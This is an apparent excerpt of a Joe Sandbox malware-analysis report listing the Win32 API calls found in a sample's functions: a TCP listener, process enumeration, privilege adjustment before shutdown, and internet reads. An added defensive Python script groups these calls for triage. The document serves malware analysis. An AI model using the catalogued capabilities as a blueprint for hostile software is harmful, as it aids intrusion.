                                                                                • Instruction Fuzzy Hash: F221E131600204AFDB11EF28DA45B6EB7B9EF48314F10816EF957AB3E2CB34AD018B55
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003F6554
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003F6564
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 003F6583
                                                                                • __wsplitpath.LIBCMT ref: 003F65A7
                                                                                • _wcscat.LIBCMT ref: 003F65BA
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003F65F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1605983538-0
                                                                                • Opcode ID: 2a84b06732e7efa9e9c9bf9262314d803a9dfd3c55efcee6b789c39f26e2d980
                                                                                • Instruction ID: cc68336f7c62eca919998f06ddb1e338ba7677ac37bdbf365b12ab4ab0a2e735
                                                                                • Opcode Fuzzy Hash: 2a84b06732e7efa9e9c9bf9262314d803a9dfd3c55efcee6b789c39f26e2d980
                                                                                • Instruction Fuzzy Hash: EB21847190021DABDF11ABA4DC89FEEBBBCAB49300F5004A5F609E7141EB759F85CB60
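Three of the API listings on this page describe a complete primitive rather than a single call: the socket/bind/listen/closesocket sequence around 00408CA8, the LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx routine around 003F7A0F, and the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk around 003F6554. When triaging a report of this size, an analyst groups each function's call set and matches it against a short list of combinations worth a second look before reading any disassembly. The Python below is an added example written for this page; it is not Joe Sandbox code and not code recovered from the sample. It parses the bullet lines exactly as they are printed here, splits them into functions on the "APIs" header, folds Win32 A/W suffixes, and reports which functions satisfy which pattern. The input text is copied from the three listings above; the names in PATTERNS are a hypothetical triage list chosen for the example, not Joe Sandbox signature names.

```python
"""Group the API call listings of a Joe Sandbox function-level report into
per-function call sets and flag the call combinations an analyst would
triage first. Added example for this page, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample: the bullet lines are copied from the "APIs" sections of
# this report (TCP listener, Toolhelp32 process walk, privilege adjustment plus
# ExitWindowsEx). The bare "APIs" header separates functions as on the page.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00408CA8
• WSAGetLastError.WSOCK32(00000000), ref: 00408CB7
• bind.WSOCK32(00000000,?,00000010), ref: 00408CD3
• listen.WSOCK32(00000000,00000005), ref: 00408CE2
• WSAGetLastError.WSOCK32(00000000), ref: 00408CFC
• closesocket.WSOCK32(00000000,00000000), ref: 00408D10
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003F6554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 003F6564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 003F6583
• __wsplitpath.LIBCMT ref: 003F65A7
• _wcscat.LIBCMT ref: 003F65BA
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 003F65F9
APIs
  • Part of subcall function 003EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
  • Part of subcall function 003EB134: GetLastError.KERNEL32 ref: 003EB1BA
• ExitWindowsEx.USER32(?,00000000), ref: 003F7A0F
"""

# One bullet: optional "Part of subcall function <addr>:", then API.MODULE,
# an optional argument list, and the call-site address after "ref:".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Hypothetical triage list for this example (not Joe Sandbox signature names):
# a function is flagged when its call set contains every name in the pattern.
PATTERNS = {
    "tcp_listener": {"socket", "bind", "listen"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "privileged_shutdown": {"LookupPrivilegeValue", "AdjustTokenPrivileges", "ExitWindowsEx"},
}


def normalize(api: str) -> str:
    """Fold the A/W suffix of Win32 names (Process32FirstW -> Process32First).
    Heuristic: strip only an uppercase A/W that follows a lowercase letter, so
    names such as IsWindow or GetDC are left untouched."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                      # call-site address from the "ref:" field
    subcall_of: Optional[int]     # callee address when the line is "Part of subcall"


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    def api_names(self) -> Set[str]:
        return {normalize(c.api) for c in self.calls}

    def direct_refs(self) -> List[int]:
        return [c.ref for c in self.calls if c.subcall_of is None]

    def flags(self) -> List[str]:
        names = self.api_names()
        return sorted(name for name, need in PATTERNS.items() if need <= names)


def parse_calls(text: str) -> List[Function]:
    """Split a report excerpt into functions on the "APIs" header lines and
    parse every bullet into a Call. Lines that do not match are skipped."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for raw in text.splitlines():
        if raw.strip() == "APIs":
            current = Function()
            functions.append(current)
            continue
        m = LINE_RE.match(raw)
        if not m or current is None:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        current.calls.append(Call(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return functions


def triage(text: str) -> List[dict]:
    """One summary per function: lowest direct call site, normalized API set,
    and the PATTERNS it satisfies."""
    out = []
    for fn in parse_calls(text):
        refs = fn.direct_refs()
        out.append({
            "first_ref": min(refs) if refs else None,
            "apis": sorted(fn.api_names()),
            "flags": fn.flags(),
        })
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE):
        site = f"{row['first_ref']:08X}" if row["first_ref"] is not None else "--------"
        print(site, ",".join(row["flags"]) or "-", " ".join(row["apis"]))
```

Subcall lines are kept in the call set so that a pattern spanning a helper (here the privilege adjustment done in the subcall at 003EB134 before ExitWindowsEx) still matches, while only direct call sites are used for the function's address. One caveat that applies to this report: the image at 003B0000 is the sample's own PE, so the call sets listed here are primitives present in the runtime; whether execution actually reaches a given primitive is answered by the dynamic behaviour sections of the report, not by the static listing.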
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003F13DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($,2F$<2F$|
                                                                                • API String ID: 1659193697-3944355438
                                                                                • Opcode ID: 73440854a01230edfb8aa9aea1fc2d83676a2c408391055b561e44ae410baa3b
                                                                                • Instruction ID: fbeab0a36171e7bc9b06e203f8b02b39cd9144e0cac8990338cb96704219cb47
                                                                                • Opcode Fuzzy Hash: 73440854a01230edfb8aa9aea1fc2d83676a2c408391055b561e44ae410baa3b
                                                                                • Instruction Fuzzy Hash: 98322475A00609DFC729CF29D480A6AB7F0FF48320B12C56EE59ADB7A1E770E941CB44
                                                                                APIs
                                                                                  • Part of subcall function 0040A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00409296
                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004092B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: a78c00439c36473e1b3144be0cfcd30e9f728aed810e7b03e57d6e473c1ffbd8
                                                                                • Instruction ID: b45a67922443d9e95a0b38b97e4a739e8c359e0f0db06ed7f5e7d11907263f10
                                                                                • Opcode Fuzzy Hash: a78c00439c36473e1b3144be0cfcd30e9f728aed810e7b03e57d6e473c1ffbd8
                                                                                • Instruction Fuzzy Hash: 5941BE70600204AFDB15AB288842F7EB7EDEF44724F04845DFA56AB2D2CB74AD018B95
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FEB8A
                                                                                • _wcscmp.LIBCMT ref: 003FEBBA
                                                                                • _wcscmp.LIBCMT ref: 003FEBCF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 003FEBE0
                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003FEC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 2387731787-0
                                                                                • Opcode ID: 0be21e1912d3dddc9d248702c45829061f6bcbe4f450402744f52551a8c9152e
                                                                                • Instruction ID: db11cd850cd2842c4f7928f1b37f19d72f771b4743077234f63e0be38a037d3e
                                                                                • Opcode Fuzzy Hash: 0be21e1912d3dddc9d248702c45829061f6bcbe4f450402744f52551a8c9152e
                                                                                • Instruction Fuzzy Hash: 6941BC356042019FCB19DF28C490EAAB3E5FF49324F10456EFA5ACB3A1DB31AD40CB95
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: 707f3170ee8e4614d77dceb400a2a4b8d5066fbcc33fa1789bac17a5d7893b8c
                                                                                • Instruction ID: a7c88d1877f13eedf589dc7c28bdda9c57f1669db8cf3ac15b2eb293d8e9e9ed
                                                                                • Opcode Fuzzy Hash: 707f3170ee8e4614d77dceb400a2a4b8d5066fbcc33fa1789bac17a5d7893b8c
                                                                                • Instruction Fuzzy Hash: C11190327002147BE7211F26EC45EAFBB98EF54760B04442EF949D7251CF34A94386A9
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,003CE014,75570AE0,003CDEF1,0044DC38,?,?), ref: 003CE02C
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003CE03E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: a834406a0aef946e71f1c690ce45b0dafb82d5085386b5ce67e6c10d3ea3daf7
                                                                                • Instruction ID: 22d8908bc04fbc6fbf9b718859b44118d0f41c1b66599f2d3cce6b05d4d8e954
                                                                                • Opcode Fuzzy Hash: a834406a0aef946e71f1c690ce45b0dafb82d5085386b5ce67e6c10d3ea3daf7
                                                                                • Instruction Fuzzy Hash: 32D0A731800B22AFCB324F61FD08B1276D4AB00301F29443FE481D2150E7F8CC808B94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: @$ G$ G$ G
                                                                                • API String ID: 3728558374-1280989995
                                                                                • Opcode ID: 05d1fc9a4c1e4696b7d28c031147210e557505b0c4acd456c6dcf7e7bee917c3
                                                                                • Instruction ID: af4db61a055ce3cb39085c94cb74a5d2175554a017b18776052b7818c13c233c
                                                                                • Opcode Fuzzy Hash: 05d1fc9a4c1e4696b7d28c031147210e557505b0c4acd456c6dcf7e7bee917c3
                                                                                • Instruction Fuzzy Hash: A172BB71E042189FCB16DFA4C481FAEB7B5EF48304F15C06EE90AAB251D734AE45CB95
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 003CB22F
                                                                                  • Part of subcall function 003CB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 003CB5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Proc$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 2749884682-0
                                                                                • Opcode ID: 6e83bcb060ae483d8d2a92afb413c66fc30eab3ac319dbc344b6ae21ba46c301
                                                                                • Instruction ID: 759ad82a6962a65243c87f0626218afbb9bbd64ba17d01cae0d175e9621f75e2
                                                                                • Opcode Fuzzy Hash: 6e83bcb060ae483d8d2a92afb413c66fc30eab3ac319dbc344b6ae21ba46c301
                                                                                • Instruction Fuzzy Hash: F3A17B70214015BADB2AAF2B6C8BFBFB95CEB41344F54491FF401D6A91CB18DC41977A
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004043BF,00000000), ref: 00404FA6
                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00404FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: f3bde4c1698841055a9e8cf7488903b2fe20b051eab4b0d56bb47529a5ca5f15
                                                                                • Instruction ID: 9cfb48063ec5fa1591042155e1ca30d4cfff7185a98c3de78f1128dfa81121af
                                                                                • Opcode Fuzzy Hash: f3bde4c1698841055a9e8cf7488903b2fe20b051eab4b0d56bb47529a5ca5f15
                                                                                • Instruction Fuzzy Hash: D641C7B1504206BFEB119E94DC81EBF77ACEB80754F10403FF705B62C0DA759E419AA8
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: \QF
                                                                                • API String ID: 4104443479-2801305206
                                                                                • Opcode ID: ce10fa9231fe8cbc866a8d40d138ef10d6d10c480840846d5428e348dc9652c0
                                                                                • Instruction ID: f72d7971d22c4407c30f78b10eb2c91ffc636ab86a8daf3fe94f00b17d7cf5d8
                                                                                • Opcode Fuzzy Hash: ce10fa9231fe8cbc866a8d40d138ef10d6d10c480840846d5428e348dc9652c0
                                                                                • Instruction Fuzzy Hash: 4DA25A74A04219CFCB25CF58C4806EDBBB5FF88318F2581AAD959AB790D7749E81CF84
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FE20D
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003FE267
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003FE2B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: ec0b329b93e7a0e7bb1a46224bd3e19b9fc1faf8182693987055991615d6ba18
                                                                                • Instruction ID: 4d632ad5221e8b96be4f5b0c67c5f90a382990c0177ee07cd139dd52473a622c
                                                                                • Opcode Fuzzy Hash: ec0b329b93e7a0e7bb1a46224bd3e19b9fc1faf8182693987055991615d6ba18
                                                                                • Instruction Fuzzy Hash: 8A213075A00118EFCB01EFA5D885EEEFBB8FF48314F0484AAE905EB255DB319915CB54
                                                                                APIs
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                • GetLastError.KERNEL32 ref: 003EB1BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1922334811-0
                                                                                • Opcode ID: 80b8c96a89e1c13404810ca89f78f11ba76d91288aba7d707b47550e629d3200
                                                                                • Instruction ID: 2c586ca775f697e21c3c06d065a2adf2c20497e9c6c9dd949e336354cf711e90
                                                                                • Opcode Fuzzy Hash: 80b8c96a89e1c13404810ca89f78f11ba76d91288aba7d707b47550e629d3200
                                                                                • Instruction Fuzzy Hash: AA11CEB2904204AFE71AAF65ECC5D6BF7BDFB44724B20852EE45697240DB70FC418B60
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F6623
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003F6664
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003F666F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: eddf3802f0a7c24571036b265f13e0f88f5c6024b6673db8540599e3fd27b9a9
                                                                                • Instruction ID: 92f16db1307aa59fb87aa367c20226268499a91be0de529f6d5d2024d43029cd
                                                                                • Opcode Fuzzy Hash: eddf3802f0a7c24571036b265f13e0f88f5c6024b6673db8540599e3fd27b9a9
                                                                                • Instruction Fuzzy Hash: A5111E71E01228BFDB118FA5EC45BBEBBBCEB45B10F104166F900E7290D7B05E059BA5
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003F7223
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003F723A
                                                                                • FreeSid.ADVAPI32(?), ref: 003F724A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 78c78a0783589d480dbdde54bed51ab4f126e63613a06f5b614f717368a78c22
                                                                                • Instruction ID: 122ffabdb010a2733e9146ae2a0fdf0c00ed8610221ae53d21fde7967d7fded1
                                                                                • Opcode Fuzzy Hash: 78c78a0783589d480dbdde54bed51ab4f126e63613a06f5b614f717368a78c22
                                                                                • Instruction Fuzzy Hash: D6F01275D14209BFDF04DFF4DD89AEDBBB8EF08605F105469A602E2191E27056448B14
